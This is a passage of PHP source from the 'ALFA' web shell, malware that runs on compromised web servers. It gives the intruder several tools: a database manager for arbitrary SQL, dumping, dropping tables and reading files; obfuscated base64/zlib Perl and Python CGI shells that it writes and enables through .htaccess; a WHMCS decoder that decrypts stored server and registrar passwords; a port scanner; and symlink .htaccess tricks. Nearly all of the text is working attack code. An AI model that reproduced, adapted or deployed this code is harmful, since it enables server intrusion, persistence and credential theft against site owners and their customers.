if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query(‘SELECT COUNT(*) as n FROM `’.$value.’`’));
$value = htmlspecialchars($value);
echo “<nobr><input type=’checkbox’ name=’tbl[]’ value=’”.$value.”‘>&nbsp;<a href=’javascript:void(0);’ onclick=\”fs(’0′,’”.$value.”‘)\”><span class=’mysql_tables’ style=’font-weight:unset;’>”.$value.”</span></a>” . (empty($_POST['sql_count'])?’&nbsp;’:” <small><span style=’font-weight:unset;’ class=’mysql_table_count’>({$n['n']})</span></small>”) . “</nobr><br>”;
}
echo “<p><input type=’checkbox’ onclick=’is();’> <input type=’button’ value=’ Dump ‘ onclick=\”fs(’4′);\” class=’button’> <input type=’button’ value=’ Drop ! ‘ onclick=\”fs(’5′);\” class=’button’></p><div class=’txtfont’>File path:</div><input type=’text’ id=’dumpfile’ name=’file’ value=’dump.sql’>”.($dumpStatus?’<p><a class=”actions” href=”javascript:void(0);” onclick=”g(\’FilesTools\’,null,\’dump.sql\’, \’download\’)”><font color=”#0F0″>~ Download File ~</font></a></p>’:”).”</td><td style=’border-top:2px solid #666;’>”;
if(@$_POST['alfa1'] == ‘select’){
$_POST['alfa1'] = ‘query’;
$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
$db->query(‘SELECT COUNT(*) as n FROM `’.$_POST['alfa2'].’`’);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo “<span>”.$_POST['alfa2'].”</span> ({$num['n']} records) Page # <input type=text name=’alfa3′ value=” . ((int)$_POST['alfa3']) . “>”;
echo ” of $pages”;
if($_POST['alfa3'] > 1)
echo ” <a href=’javascript:void(0);’ onclick=fs(’1′,’[\””.$_POST['alfa2'].”\”,\””.($_POST['alfa3']-1).”\”]’)>&lt; Prev</a>”;
if($_POST['alfa3'] < $pages)
echo ” <a href=’javascript:void(0);’ onclick=fs(’1′,’[\””.$_POST['alfa2'].”\”,\””.($_POST['alfa3']+1).”\”]’)>Next &gt;</a>”;
$_POST['alfa3']–;
$cache_table = $_POST['alfa2'];
if($_POST['type']==’pgsql’)
$_POST['alfa2'] = ‘SELECT * FROM `’.$_POST['alfa2'].’` LIMIT 30 OFFSET ‘.($_POST['alfa3']*30);
else
$_POST['alfa2'] = ‘SELECT * FROM `’.$_POST['alfa2'].’` LIMIT ‘.($_POST['alfa3']*30).’,30′;
echo “<br><br>”;
}
if((@$_POST['alfa1'] == ‘query’) && !empty($_POST['alfa2'])) {
$prikey = $db->fetch($db->query(“SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = ‘”.@addslashes($_POST['sql_base']).”‘ AND TABLE_NAME = ‘”.@addslashes($cache_table).”‘ AND COLUMN_KEY = ‘PRI’”));
$db->query(@$_POST['alfa2']);
if($db->res !== false){
$title = false;
echo ‘<table width=”100%” cellspacing=”1″ cellpadding=”2″ class=”main” style=”background-color:#292929″ border=”1″>’;
$line = 1;
while($item = $db->fetch()) {
if(!$title){
echo ‘<tr><th>#</th>’;
foreach($item as $key => $value){
echo ‘<th>’.$key.’</th>’;
}
reset($item);
$title=true;
echo ‘</tr><tr>’;
$line = 2;
}
if($cache_table!=”){
$cacheMsg = ‘<a href=”javascript:void(0);” onclick=fs(\’2\’,\’[“‘.$cache_table.’”,”‘.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).’”,”‘.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).’”]\’)>Edit</a>’;
}else{
$cacheMsg =’-’;
}
echo ‘<tr class=”l’.$line.’”><td>’.$cacheMsg.’</td>’;
$line = $line==1?2:1;
foreach($item as $key => $value){
if($value == null)
echo ‘<td><i>null</i></td>’;
else
echo ‘<td>’.nl2br(htmlspecialchars($value)).’</td>’;
}
echo ‘</tr>’;
}
echo ‘</table>’;
} else {
echo ‘<div><b>Error:</b> ‘.htmlspecialchars($db->error()).’</div>’;
}
}
echo(‘</form>’);
if((@$_POST['alfa1'] == ‘edit’) && !empty($_POST['alfa2'])){
$data = explode(‘:’,$_POST['alfa3']);
echo (‘<p><div class=”txtfont”>Table:</div> <font color=”#0F0″>’.$data[0].’</font></p>’);
echo(“<form onsubmit=’fsu(this);return false;’><table border=’1′>”);
if($data[1] != ’0′){
$data[2] = __ZGVjb2Rlcg($data[2]);
$data[2] = str_replace(‘”‘,”,$data[2]);
$fetch = $db->fetch($db->query(“SELECT * FROM `”.$data[0].”` WHERE `”.$data[1].”` = ‘”.$data[2].”‘”));
$fetch['__ALFAKEY'] = $data[1];
$fetch['__ALFAKEYVAL'] = $data[2];
}else{
$d = __ZGVjb2Rlcg($data[2]);
$fetch = json_decode($d, true);
}
foreach($fetch as $key => $value){
if($key==’__ALFAKEY’||$key==’__ALFAKEYVAL’)continue;
$value = htmlspecialchars($value);
echo(“<tr><td>$key</td><td><input name=’$key’ value=’$value’ /></td></tr>”);
}
echo(“</table><input type=’hidden’ name=’__ALFADATA’ value=’”.__ZW5jb2Rlcg(json_encode(($data[1] != ’0′?array(‘__ALFAKEY’=>$data[1],’__ALFAKEYVAL’=>$data[2]):$fetch))).”‘><input type=’hidden’ name=’__ALFATBL’ value=’{$data[0]}’><input type=’submit’ value=’ ‘></form>”);
}
if((@$_POST['alfa1'] == ‘update’) && !empty($_POST['alfa2'])){
$data = json_decode($_POST['alfa2'], true);
$alfadata = $data['__ALFADATA'];
$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
$keyval = array();
echo (‘<p><div class=”txtfont”>Table:</div> <font color=”#0F0″>’.$data['__ALFATBL'].’</font></p>’);
echo(“<form onsubmit=’fsu(this);return false;’><table border=’1′>”);
$set = ”;
foreach($data as $key => $value){
if($key==’__ALFATBL’||$key==’__ALFADATA’)continue;
if($data2['__ALFAKEY']==$key){
$keyval['__ALFAKEY'] = $key;
$keyval['__ALFAKEYVAL'] = $value;
}
$set .= “`$key` = ‘”.addslashes($value).”‘,”;
$value = htmlspecialchars($value);
echo(“<tr><td>$key</td><td><input name=’$key’ value=’$value’ /></td></tr>”);
}
unset($data['__ALFADATA']);

echo(“</table><input type=’hidden’ name=’__ALFADATA’ value=’”.__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array(‘__ALFAKEY’=>$keyval['__ALFAKEY'],’__ALFAKEYVAL’=>$keyval['__ALFAKEYVAL']):$data))).”‘><input type=’hidden’ name=’__ALFATBL’ value=’{$data['__ALFATBL']}’><input type=’submit’ value=’ ‘></form>”);

if(!isset($data2['__ALFAKEY'])){
$where = ”;
foreach($data2 as $key => $value){
if($key==’__ALFATBL’||$key==’__ALFADATA’)continue;
$value = addslashes($value);
$where .= “`$key` = ‘$value’ AND “;
}
$where = substr($where, 0, -4);
}else{
$where = “`{$data2['__ALFAKEY']}` = ‘”.addslashes($data2['__ALFAKEYVAL']).”‘”;
}
$set = substr($set, 0, -1);
$db->fetch($db->query(“UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where”));
if($db->error())
echo ‘<div><b>Error:</b> ‘.htmlspecialchars($db->error()).’</div>’;
else echo(“Success…!”);
}
if($_POST['alfa1']!=’edit’&&$_POST['alfa1']!=’update’){
echo “<p>Query:</p><form onsubmit=’fs(this);return false;’>
<input type=’hidden’ name=’alfa1′ value=’query’/>
<textarea name=’query’ style=’width:100%;height:100px’>”;
echo $_POST['alfa1']!=’loadfile’?htmlspecialchars($_POST['alfa2']):”;
echo “</textarea><p><center><input type=submit value=’ ‘></center></p></form>”;
}
echo “</td></tr>”;
}
echo “</table></form><br/>”;
if($_POST['type']==’mysql’) {
$db->query(“SELECT 1 FROM mysql.user WHERE concat(`user`, ‘@’, `host`) = USER() AND `File_priv` = ‘y’”);
if($db->fetch())
echo “<form onsubmit=\”fs(’3′,this.f.value);return false;\”><div class=’txtfont’>Load file:</div> <input class=’toolsInp’ type=’text’ name=’f’> <input type=’submit’ value=’ ‘></form>”;
}
if(@$_POST['alfa1'] == ‘loadfile’){
$file = $db->loadFile($_POST['alfa2']);
echo ‘<pre class=ml1>’.htmlspecialchars($file['file']).’</pre>’;
}
}else{
echo htmlspecialchars($db->error());
}
echo ‘</div>’;
alfafooter();
}
function alfaselfrm(){
if(isset($_POST['alfa1'])&&$_POST['alfa1']==’yes’){
echo(__pre().’<center>’);
if(@unlink($GLOBALS['__file_path'])){
echo(‘<b>Shell has been removed</i> :)</b>’);
}else{
echo ‘unlink error!’;
}
echo(‘</center>’);
}
if(isset($_POST['alfa1'])&&$_POST['alfa1']!=’yes’){
echo “<div class=header>”;
echo ”
<center><p><img src=\”http://solevisible.com/images/farvahar-iran.png\”></p>”;
echo ‘<p><div class=”txtfont”>Do you want to destroy me?!</div><a href=javascript:void(0) onclick=”g(\’selfrm\’,null,\’yes\’);”> Yes</a>’;
echo ‘</p></center></div>’;
}
}
function alfacgishell(){
alfahead();
$div = “”;
if(!in_array($_POST['alfa1'],array(‘perl’,’py’))){
$div = “</div>”;
echo ‘<div class=header><center><p><div class=”txtfont_header”>| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick=”runcgi(\’perl\’)”>| Perl | </a><a href=javascript:void(0) onclick=”runcgi(\’py\’);”>| Python | </a>’;
}
if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array(‘perl’,’py’))){
@mkdir(‘cgialfa’,0755);
@chdir(‘cgialfa’);
alfacgihtaccess(‘cgi’);
$name = $_POST['alfa1'].’.alfa’;
$perl = ‘#!/usr/bin/perl   -I/usr/local/bandmin’.”\n”.’use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(“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”)));’;;
$py = ‘#!/usr/bin/python’.”\nimport zlib, base64\n”.’eval(compile(zlib.decompress(base64.b64decode(“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”)),\’<string>\’,\’exec\’))’;
if($_POST['alfa1']==’perl’){$code = $perl;}else{$code = $py;}
if(__write_file($name,$code)){
@chmod($name,0755);
echo ‘<iframe src=”‘.’cgialfa/’.$name.’” width=”100%” height=”600px” frameborder=”0″ style=”opacity:0.9;filter: alpha(opacity=9);overflow:auto;”></iframe>’;
}
}
echo $div;
alfafooter();
}
function alfaWhmcs(){
alfahead();
echo ‘<div class=header>’;
function decrypt($string,$cc_encryption_hash){
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen ($hash_key);
$string = __ZGVjb2Rlcg($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) – $hash_length);
$iv = $out = ”;
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c – $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string)
{
if(function_exists(‘sha1′))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = ”;
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
AlfaNum(8,9,10);
echo “<center><br><div class=’txtfont_header’>| WHMCS DeCoder |</div><p>”.getConfigHtml(‘whmcs’).”</p><form onsubmit=\”g(‘Whmcs’,null,this.form_action.value,’decoder’,this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\”>
<input type=’hidden’ name=’form_action’ value=’2′>”;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_host : ‘, ‘inputName’ => ‘db_host’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_username : ‘, ‘inputName’ => ‘db_username’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_password : ‘, ‘inputName’ => ‘db_password’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘db_name : ‘, ‘inputName’ => ‘db_name’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘cc_encryption_hash : ‘, ‘inputName’ => ‘cc_encryption_hash’, ‘id’ => ‘cc_encryption_hash’, ‘inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo “<p><input type=’submit’ value=’ ‘ name=’Submit’></p></form></center>”;
if($_POST['alfa5']!=”){
$db_host=($_POST['alfa7']);
$db_username=($_POST['alfa3']);
$db_password=($_POST['alfa4']);
$db_name=($_POST['alfa5']);
$cc_encryption_hash=($_POST['alfa6']);
echo __pre();
$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
$query = mysqli_query($conn,”SELECT * FROM tblservers”);
$num = mysqli_num_rows($query);
if ($num > 0){
for($i=0; $i <=$num-1; $i++){
$v = @mysqli_fetch_array($query);
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo(“<center><table border=’1′>”);
$password = decrypt ($v['password'], $cc_encryption_hash);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Type</font></td><td>$type</td></tr></b>”);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Active</font></td><td>$active</td></tr></b>”);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Hostname</font></td><td>$hostname</td></tr></b>”);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Ip</font></td><td>$ipaddress</td></tr></b>”);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Username</font></td><td>$username</td></tr></b>”);
echo(“<tr><td><b><font color=\”#FFFFFF\”>Password</font></td><td>$password</td></tr></b>”);
echo “</table><br><br></center>”;
}
$query1 = @mysqli_query($conn,”SELECT * FROM tblregistrars”);
$num1 = @mysqli_num_rows($query1);
if ($num1 > 0){
for($i=0; $i <=$num1 -1; $i++){
$v = mysqli_fetch_array($query1);
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt($v['value'], $cc_encryption_hash);
if ($value==””){
$value=0;
}
echo(“<center>Domain Reseller <br><center>”);
echo(“<center><table border=’1′>”);
echo(“<tr><td><b><font color=\”#67ABDF\”>Register</font></td><td>$registrar</td></tr></b>”);
echo(“<tr><td><b><font color=\”#67ABDF\”>Setting</font></td><td>$setting</td></tr></b>”);
echo(“<tr><td><b><font color=\”#67ABDF\”>Value</font></td><td>$value</td></tr></b>”);
echo “</table><br><br></center>”;
}
}
}else{__alert(‘<font color=”red”>tblservers is Empty…!</font>’);};
}
echo “</div>”;
alfafooter();
}
function alfaportscanner(){
alfahead();
echo ‘<div class=header><center><p><div class=”txtfont_header”>| Port Scaner |</div></p>
<form action=”” method=”post” onsubmit=”g(\’portscanner\’,null,null,this.start.value,this.end.value,this.host.value); return false;”>
<input type=”hidden” name=”y” value=”phptools”>
<div class=”txtfont”>Host: </div> <input id=”text” type=”text” name=”host” value=”localhost”/>
<div class=”txtfont”>Port start: </div> <input id=”text” size=”5″ type=”text”  name=”start” value=”80″/>
<div class=”txtfont”>Port end: </div> <input id=”text” size=”5″ type=”text” name=”end” value=”80″/> <input type=”submit” value=” ” />
</form></center><br>’;
$start = strip_tags($_POST['alfa2']);
$end = strip_tags($_POST['alfa3']);
$host = strip_tags($_POST['alfa4']);
if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
echo __pre();
$packetContent = “GET / HTTP/1.1\r\n\r\n”;
if(ctype_xdigit($packetContent))$packetContent = @pack(“H*” , $packetContent);
else{
$packetContent = str_replace(array(“\r”,”\n”), “”, $packetContent);
$packetContent = str_replace(array(“\\r”,”\\n”), array(“\r”, “\n”), $packetContent);
}
for($i = $start; $i<=$end; $i++){
$sock = @fsockopen($host, $i, $errno, $errstr, 3);
if($sock){
stream_set_timeout($sock, 5);
fwrite($sock, $packetContent.”\r\n\r\n\x00″);
$counter = 0;
$maxtry = 1;
$bin = “”;
do{
$line = fgets($sock, 1024);
if(trim($line)==””)$counter++;
$bin .= $line;
}while($counter<$maxtry);
fclose($sock);
echo “<center><p>Port <font style=’color:#DE3E3E’>$i</font> is open</p>”;
echo “<p><textarea style=’height:140px;width:50%;’>”.$bin.”</textarea></p></center>”;
}
flush();
}
}
echo ‘</div>’;
alfafooter();
}
function alfacgihtaccess($m,$d=”, $symname=false){
$readme = “”;
if($symname){$readme=”\nReadmeName “.trim($symname);}
if($m==’cgi’){
$code = “#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa”;
}elseif($m==’sym’){
$code = “#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all”;
}elseif($m==’shtml’){
$code = “Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml”;
}
@__write_file($d.’.htaccess’,$code);
}
function alfabasedir(){
alfahead();
echo ‘<div class=header>
<center><p><div class=”txtfont_header”>| Open Base Dir |</div></p></center>’;
